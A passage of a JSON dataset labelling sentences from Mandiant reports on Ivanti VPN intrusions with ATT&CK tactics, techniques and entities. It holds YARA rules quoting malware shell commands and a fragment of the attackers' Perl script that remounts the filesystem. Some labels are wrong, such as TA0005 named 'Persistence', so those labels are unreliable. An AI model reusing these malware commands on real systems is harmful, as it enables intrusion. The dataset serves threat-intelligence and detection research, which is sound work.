negotiation of an RDP connection", "start": 24, "end": 79, "label": "Action" }, { "text": "security.jar", "start": 4, "end": 16, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s123-623e33", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 123, "context_before": "The security.jar plugin is executed during the negotiation of an RDP connection when the system invokes the Handshake plugin.", "sentence_text": "The getHandshakePlugin()\nmethod creates a new thread from a Runnable interface that repeatedly calls SparkPlugin.watchdog()\nevery ten (10) seconds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s124-04a618", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 124, "context_before": "The getHandshakePlugin()\nmethod creates a new thread from a Runnable interface that repeatedly calls SparkPlugin.watchdog()\nevery ten (10) seconds.", "sentence_text": "This acts as a persistence method to ensure the continuous execution of the malicious watchdog method without interfering with the primary operation of the SparkGateway application.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "Ensure continuous execution of malicious watchdog method via persistence mechanism.", "entities": [ { "text": "acts as a persistence method to ensure the continuous execution of the malicious watchdog method", "start": 5, "end": 101, "label": "Action" }, { "text": "SparkGateway application", "start": 156, "end": 180, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s125-12511b", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 125, "context_before": "This acts as a persistence method to ensure the continuous execution of the malicious watchdog method without interfering with the primary operation of the SparkGateway application.", "sentence_text": "The\nwatchdog\nmethod first checks if the shared object mem.rd (PITHOOK) is mapped within the web process memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s126-bf2804", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 126, "context_before": "The\nwatchdog\nmethod first checks if the shared object mem.rd (PITHOOK) is mapped within the web process memory.", "sentence_text": "If not, it injects mem.rd into the web process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s127-51afd4", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 127, "context_before": "If not, it injects mem.rd into the web process.", "sentence_text": "mem.rd\n) into the web process, where %d represents the process ID (PID) of the web process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s128-f47da1", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 128, "context_before": "mem.rd\n) into the web process, where %d represents the process ID (PID) of the web process.", "sentence_text": "/data/runtime/cockpit/memorysCounter -p %d /data/runtime/cockpit/mem.rd We determined that /data/runtime/cockpit/memorysCounter is a direct instance of Kubo Injector without any additional modifications or changes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s129-12ba1a", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 129, "context_before": "/data/runtime/cockpit/memorysCounter -p %d /data/runtime/cockpit/mem.rd We determined that /data/runtime/cockpit/memorysCounter is a direct instance of Kubo Injector without any additional modifications or changes.", "sentence_text": "Kubo Injector is based on the popular linux-inject project, a utility that can inject a shared object into an arbitrary process given a process name or process ID.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s130-f699a2", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 130, "context_before": "Kubo Injector is based on the popular linux-inject project, a utility that can inject a shared object into an arbitrary process given a process name or process ID.", "sentence_text": "PITHOOK hooks the accept and accept4 functions within the web process by modifying the PLT.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "The malware hooks system functions in a web process by modifying the procedure linkage table to alter execution flow.", "entities": [ { "text": "PITHOOK", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "hooks the accept and accept4 functions within the web process by modifying the PLT", "start": 8, "end": 90, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s131-14b88a", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 131, "context_before": "PITHOOK hooks the accept and accept4 functions within the web process by modifying the PLT.", "sentence_text": "When PITHOOK receives a buffer matching the predefined magic byte sequence, it will duplicate the socket and forward it to PITSTOP over the Unix domain socket /data/runtime/cockpit/wd.fd Lastly, the watchdog method will execute the PITSTOP backdoor ( /data/runtime/cockpit/dsAgent ) if it is not already running.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "The malware monitors for specific input patterns, duplicates sockets, forwards connections to another component, and executes a backdoor if it is not already running.", "entities": [ { "text": "PITHOOK", "start": 5, "end": 12, "label": "MalwareTool" }, { "text": "PITSTOP", "start": 123, "end": 130, "label": "MalwareTool" }, { "text": "duplicate the socket and forward it to PITSTOP", "start": 84, "end": 130, "label": "Action" }, { "text": "execute the PITSTOP backdoor", "start": 220, "end": 248, "label": "Action" }, { "text": "/data/runtime/cockpit/wd.fd", "start": 159, "end": 186, "label": "Infrastructure_Indicator" }, { "text": "/data/runtime/cockpit/dsAgent", "start": 251, "end": 280, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s132-d2f3b5", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 132, "context_before": "When PITHOOK receives a buffer matching the predefined magic byte sequence, it will duplicate the socket and forward it to PITSTOP over the Unix domain socket /data/runtime/cockpit/wd.fd Lastly, the watchdog method will execute the PITSTOP backdoor ( /data/runtime/cockpit/dsAgent ) if it is not already running.", "sentence_text": "PITSTOP creates and listens on the Unix domain socket located at /data/runtime/cockpit/wd.fd .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "The malware establishes a local communication channel by creating and listening on a Unix domain socket.", "entities": [ { "text": "PITSTOP", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "creates and listens on the Unix domain socket", "start": 8, "end": 53, "label": "Action" }, { "text": "/data/runtime/cockpit/wd.fd", "start": 65, "end": 92, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s133-af2ffb", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 133, "context_before": "PITSTOP creates and listens on the Unix domain socket located at /data/runtime/cockpit/wd.fd .", "sentence_text": "It waits to receive a socket forwarded by PITHOOK after receiving the predefined magic byte sequence.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "The malware waits for and receives a forwarded socket from another component after a specific trigger condition is met.", "entities": [ { "text": "PITHOOK", "start": 42, "end": 49, "label": "MalwareTool" }, { "text": "waits to receive a socket forwarded by PITHOOK", "start": 3, "end": 49, "label": "Action" }, { "text": "predefined magic byte sequence", "start": 70, "end": 100, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s134-2820b6", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 134, "context_before": "It waits to receive a socket forwarded by PITHOOK after receiving the predefined magic byte sequence.", "sentence_text": "Then PITSTOP duplicates the socket for further communication over TLS.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "PITSTOP duplicates the socket to support further communication over TLS.", "entities": [ { "text": "PITSTOP", "start": 5, "end": 12, "label": "MalwareTool" }, { "text": "duplicates the socket for further communication over TLS", "start": 13, "end": 69, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s135-834725", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 135, "context_before": "Then PITSTOP duplicates the socket for further communication over TLS.", "sentence_text": "When the TLS connection is established, PITSTOP uses Base64 and a hard-coded AES key to evaluate the incoming command.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Use Base64 and a hard-coded AES key to evaluate incoming command over an established TLS connection.", "entities": [ { "text": "uses Base64 and a hard-coded AES key to evaluate the incoming command", "start": 48, "end": 117, "label": "Action" }, { "text": "TLS connection", "start": 9, "end": 23, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s136-2676fa", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 136, "context_before": "When the TLS connection is established, PITSTOP uses Base64 and a hard-coded AES key to evaluate the incoming command.", "sentence_text": "It supports shell command execution, file write, and file read on the compromised appliance.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute shell commands and perform file read and write operations on the compromised appliance.", "entities": [ { "text": "supports shell command execution, file write, and file read", "start": 3, "end": 62, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s137-91a124", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 137, "context_before": "It supports shell command execution, file write, and file read on the compromised appliance.", "sentence_text": "Outlook and Implications UNC5325’s TTPs and malware deployment showcase the capabilities that suspected China-nexus espionage actors have continued to leverage against edge infrastructure in conjunction with zero days.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s138-e2f84f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 138, "context_before": "Outlook and Implications UNC5325’s TTPs and malware deployment showcase the capabilities that suspected China-nexus espionage actors have continued to leverage against edge infrastructure in conjunction with zero days.", "sentence_text": "Similar to UNC4841 ’s familiarity with Barracuda ESGs, UNC5325 demonstrates significant knowledge of the Ivanti Connect Secure appliance as seen in both the malware they used and the attempts to persist across factory resets.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Persistence" } ], "techniques": [ { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "Attempt to persist across factory resets on the Ivanti Connect Secure appliance.", "entities": [ { "text": "attempts to persist across factory resets", "start": 183, "end": 224, "label": "Action" }, { "text": "Ivanti Connect Secure appliance", "start": 105, "end": 136, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s139-269ea2", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 139, "context_before": "Similar to UNC4841 ’s familiarity with Barracuda ESGs, UNC5325 demonstrates significant knowledge of the Ivanti Connect Secure appliance as seen in both the malware they used and the attempts to persist across factory resets.", "sentence_text": "The material in this blog post is being shared as cyber threat indicators and defensive measures solely for cybersecurity purposes in accordance with the Cybersecurity Information Sharing Act of 2015 (“CISA/2015”).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s140-13daf1", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 140, "context_before": "The material in this blog post is being shared as cyber threat indicators and defensive measures solely for cybersecurity purposes in accordance with the Cybersecurity Information Sharing Act of 2015 (“CISA/2015”).", "sentence_text": "Indicators of Compromise (IOCs)\nHost-Based Indicators (HBIs)\nYARA Rules\nrule M_Launcher_PITDOG_1 { meta:\nauthor = \"Mandiant\" description = \"This rule is designed to detect on events related to PITDOG.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s141-afae5b", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 141, "context_before": "Indicators of Compromise (IOCs)\nHost-Based Indicators (HBIs)\nYARA Rules\nrule M_Launcher_PITDOG_1 { meta:\nauthor = \"Mandiant\" description = \"This rule is designed to detect on events related to PITDOG.\"", "sentence_text": "strings:\n$str2 = \"cat /proc/%d/maps | grep mem.rd\" $str3 = \"/data/runtime/cockpit/memorysCounter -p %d /data/runtime/cockpit/mem.rd\" $str4 = \"rm -f /data/runtime/cockpit/wd.lock\" $str5 = \"/data/runtime/cockpit/dsAgent\" $str6 = \"watchdog\" $str7 = \"ps aux|grep '/home/bin/web'|grep -v grep | awk '{if (NR!=1) {print $2}}'\" condition:\nuint32(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s142-eb604c", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 142, "context_before": "strings:\n$str2 = \"cat /proc/%d/maps | grep mem.rd\" $str3 = \"/data/runtime/cockpit/memorysCounter -p %d /data/runtime/cockpit/mem.rd\" $str4 = \"rm -f /data/runtime/cockpit/wd.lock\" $str5 = \"/data/runtime/cockpit/dsAgent\" $str6 = \"watchdog\" $str7 = \"ps aux|grep '/home/bin/web'|grep -v grep | awk '{if (NR!=1) {print $2}}'\" condition:\nuint32(0)", "sentence_text": "== 0xBEBAFECA and all of them } rule M_Utility_PITHOOK_1 { meta:\nauthor = \" Mandiant\" description = \"This rule is designed to detect on events related to PITHOOK.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s143-c4659e", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 143, "context_before": "== 0xBEBAFECA and all of them } rule M_Utility_PITHOOK_1 { meta:\nauthor = \" Mandiant\" description = \"This rule is designed to detect on events related to PITHOOK.\"", "sentence_text": "strings:\n$str1 = \"/data/runtime/cockpit/wd.fd\" $str2 = \"/proc/self/maps\" $str3 = \"plthook_open\" $str4 = \"plthook_replace\" $str5 = \"plthook_close\" $str6 = \"plthook_open_by_handle\" $str7 = \"plthook_open_by_address\" $str8 = \"plthook_enum\" $str9 = \"plthook_error\" $str10 = \"accept4_hook\" condition:\nuint32(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s144-6eb1cb", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 144, "context_before": "strings:\n$str1 = \"/data/runtime/cockpit/wd.fd\" $str2 = \"/proc/self/maps\" $str3 = \"plthook_open\" $str4 = \"plthook_replace\" $str5 = \"plthook_close\" $str6 = \"plthook_open_by_handle\" $str7 = \"plthook_open_by_address\" $str8 = \"plthook_enum\" $str9 = \"plthook_error\" $str10 = \"accept4_hook\" condition:\nuint32(0)", "sentence_text": "== 0x464C457F and all of them } rule M_Hunting_Webshell_BUSHWALK_1 { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s145-77c339", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 145, "context_before": "== 0x464C457F and all of them } rule M_Hunting_Webshell_BUSHWALK_1 { meta:", "sentence_text": "author = \"Mandiant\" description = \"This rule detects class used in PITFUEL, a malicious JAR-based launcher that loads malicious code\" strings:\n$h1 = {50 4B 03 04} $s1 = \"com/toremote/gateway/plugin/PluginManager.class\" condition:\n$h1 at 0 and for any i in (0..#h1): ($s1 in (@h1[i]..@h1[i]+80))\n}\nOrganizations can validate their security controls using the following actions with Posted in Threat Intelligence Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s146-65bc81", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 146, "context_before": "author = \"Mandiant\" description = \"This rule detects class used in PITFUEL, a malicious JAR-based launcher that loads malicious code\" strings:\n$h1 = {50 4B 03 04} $s1 = \"com/toremote/gateway/plugin/PluginManager.class\" condition:\n$h1 at 0 and for any i in (0..#h1): ($s1 in (@h1[i]..@h1[i]+80))\n}\nOrganizations can validate their security controls using the following actions with Posted in Threat Intelligence Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nJan. 31, 2024 | CVE-2024-21888 | 8.8 | Privilege escalation vulnerability in web component DSUserAgentCap.pm | e4fe3a314a3aee5aee9c55787a33671c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s147-806924", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 147, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nJan. 31, 2024 | CVE-2024-21888 | 8.8 | Privilege escalation vulnerability in web component DSUserAgentCap.pm | e4fe3a314a3aee5aee9c55787a33671c", "sentence_text": "| BUSHWALK activator / deactivator querymanifest.cgi | e48716521dc48425feae71bc9dc768cd | BUSHWALK variant diskCounters | 8c4b32e8ee9e0b2f8dab01364971ffff | Dropper for DSUserAgentCap.pm diskmonitor | e33a3a90f1f8fa6d8f17bc6151b027d6 | Encrypted DSUserAgentCap.pm diskAnalysis | 6c58b8b1e3b36a5a124afd110c109ebc | Encrypted BUSHWALK variant plugin.jar | b76d7890a7a7ff6d0b1151a8251e318f | PITFUEL SparkGateway plugin gateway.conf | 9e0941c4851d414b5d25dd15872c3e47", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s148-3e114e", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 148, "context_before": "| BUSHWALK activator / deactivator querymanifest.cgi | e48716521dc48425feae71bc9dc768cd | BUSHWALK variant diskCounters | 8c4b32e8ee9e0b2f8dab01364971ffff | Dropper for DSUserAgentCap.pm diskmonitor | e33a3a90f1f8fa6d8f17bc6151b027d6 | Encrypted DSUserAgentCap.pm diskAnalysis | 6c58b8b1e3b36a5a124afd110c109ebc | Encrypted BUSHWALK variant plugin.jar | b76d7890a7a7ff6d0b1151a8251e318f | PITFUEL SparkGateway plugin gateway.conf | 9e0941c4851d414b5d25dd15872c3e47", "sentence_text": "| SparkGateway config to load PITFUEL libchilkat.so | fd83b3e9db57838b62c5baf8218ce5a8 | LITTLELAMB.WOOLTEA backdoor libaprhelper.so | 2ddeca6511506fe435dc1f63b4cf061c | PITSOCK backdoor security.jar | f64a799ff16aded3f4d6706ffbd7e6dd | PITDOG SparkGateway plugin gateway.conf", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s149-3edad9", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 149, "context_before": "| SparkGateway config to load PITFUEL libchilkat.so | fd83b3e9db57838b62c5baf8218ce5a8 | LITTLELAMB.WOOLTEA backdoor libaprhelper.so | 2ddeca6511506fe435dc1f63b4cf061c | PITSOCK backdoor security.jar | f64a799ff16aded3f4d6706ffbd7e6dd | PITDOG SparkGateway plugin gateway.conf", "sentence_text": "| fb973c8bbfdba234ea83ee20084dcac9", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s150-fbd4a4", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 150, "context_before": "| fb973c8bbfdba234ea83ee20084dcac9", "sentence_text": "| SparkGateway config to load PITDOG mem.rd | 5368b1122c10fa7850f44d3e16fc18fb", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s151-4dcfc3", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 151, "context_before": "| SparkGateway config to load PITDOG mem.rd | 5368b1122c10fa7850f44d3e16fc18fb", "sentence_text": "| PITHOOK backdoor memorysCounter | 31a591a28198f05e9ab4d12609a9ce81 | Kubo Injector dsAgent | 5f561f217a8046de8cadf418ef4dfda0", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s152-5941a5", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 152, "context_before": "| PITHOOK backdoor memorysCounter | 31a591a28198f05e9ab4d12609a9ce81 | Kubo Injector dsAgent | 5f561f217a8046de8cadf418ef4dfda0", "sentence_text": "| PITSTOP backdoor wd.fd | N", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s153-0d5628", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 153, "context_before": "| PITSTOP backdoor wd.fd | N", "sentence_text": "/A | Unix domain socket for PITSTOP wd.lock", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s154-249be4", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 154, "context_before": "/A | Unix domain socket for PITSTOP wd.lock", "sentence_text": "| N/A | Mutex for PITSTOP A106-986 | Application Vulnerability - CVE-2024-21893, Exploitation, Variant #1 A107-055 | Application", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s155-b68e3b", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 155, "context_before": "| N/A | Mutex for PITSTOP A106-986 | Application Vulnerability - CVE-2024-21893, Exploitation, Variant #1 A107-055 | Application", "sentence_text": "Vulnerability - CVE-2024-22024, Exploitation, Variant #1 [FILTERED_TABLES_END]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s1-4aac6d", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation | Google Cloud Blog Threat Intelligence Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation January 11, 2024 Written by: Tyler McLellan, John Wolfram, Gabby Roncone, Matt Lin, Robert Wallace, Dimiter Andonov Note: This is a developing campaign under active analysis by Mandiant and Ivanti.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s2-47733c", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation | Google Cloud Blog Threat Intelligence Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation January 11, 2024 Written by: Tyler McLellan, John Wolfram, Gabby Roncone, Matt Lin, Robert Wallace, Dimiter Andonov Note: This is a developing campaign under active analysis by Mandiant and Ivanti.", "sentence_text": "On January 10, 2024, Ivanti disclosed two vulnerabilities, CVE-2023-46805 and CVE-2024-21887 , impacting Ivanti Connect Secure VPN (“CS”, formerly Pulse Secure) and Ivanti Policy Secure (“PS”) appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s3-b2eed7", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "On January 10, 2024, Ivanti disclosed two vulnerabilities, CVE-2023-46805 and CVE-2024-21887 , impacting Ivanti Connect Secure VPN (“CS”, formerly Pulse Secure) and Ivanti Policy Secure (“PS”) appliances.", "sentence_text": "Successful exploitation could result in authentication bypass and command injection, leading to further downstream compromise of a victim network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s4-4ab2dd", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "Successful exploitation could result in authentication bypass and command injection, leading to further downstream compromise of a victim network.", "sentence_text": "As part of their investigation, Ivanti has released a blog post and mitigations for the vulnerabilities exploited in this campaign to assist with determining if systems have been impacted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s5-9bff9c", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "As part of their investigation, Ivanti has released a blog post and mitigations for the vulnerabilities exploited in this campaign to assist with determining if systems have been impacted.", "sentence_text": "Patches are currently being developed and Ivanti customers are urged to follow the KB article to stay informed on target dates and releases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s6-bdc67d", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "Patches are currently being developed and Ivanti customers are urged to follow the KB article to stay informed on target dates and releases.", "sentence_text": "Post Exploitation Activity Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, in several cases trojanizing legitimate files within CS with malicious code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s7-d1bc31", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "Post Exploitation Activity Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, in several cases trojanizing legitimate files within CS with malicious code.", "sentence_text": "UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "Leverage the PySoxy tunneler and BusyBox to enable post-exploitation activity.", "entities": [ { "text": "UNC5221", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity", "start": 26, "end": 105, "label": "Action" }, { "text": "PySoxy tunneler", "start": 41, "end": 56, "label": "MalwareTool" }, { "text": "BusyBox", "start": 61, "end": 68, "label": "MalwareTool" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s8-4da5a5", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity.", "sentence_text": "Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script ( sessionserver.pl ) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Leverage a Perl script to remount the filesystem as read/write and deploy THINSPOOL to write the LIGHTWIRE web shell to a legitimate file.", "entities": [ { "text": "UNC5221", "start": 55, "end": 62, "label": "ThreatActor" }, { "text": "leveraged a Perl script ( sessionserver.pl ) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file", "start": 63, "end": 282, "label": "Action" }, { "text": "sessionserver.pl", "start": 89, "end": 105, "label": "MalwareTool" }, { "text": "THINSPOOL", "start": 177, "end": 186, "label": "MalwareTool" }, { "text": "LIGHTWIRE", "start": 237, "end": 246, "label": "MalwareTool" }, { "text": "Connect Secure file", "start": 263, "end": 282, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s9-a4b47d", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script ( sessionserver.pl ) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling.", "sentence_text": "use lib ($ENV{'DSINSTALL'} =~ /(\\S*)/)[0] .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s10-2ad4b2", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "use lib ($ENV{'DSINSTALL'} =~ /(\\S*)/)[0] .", "sentence_text": "\"/perl\";\nuse DSSafe;\nsystem(\"mount -o remount,rw /\");\nsystem(\"chmod a+x 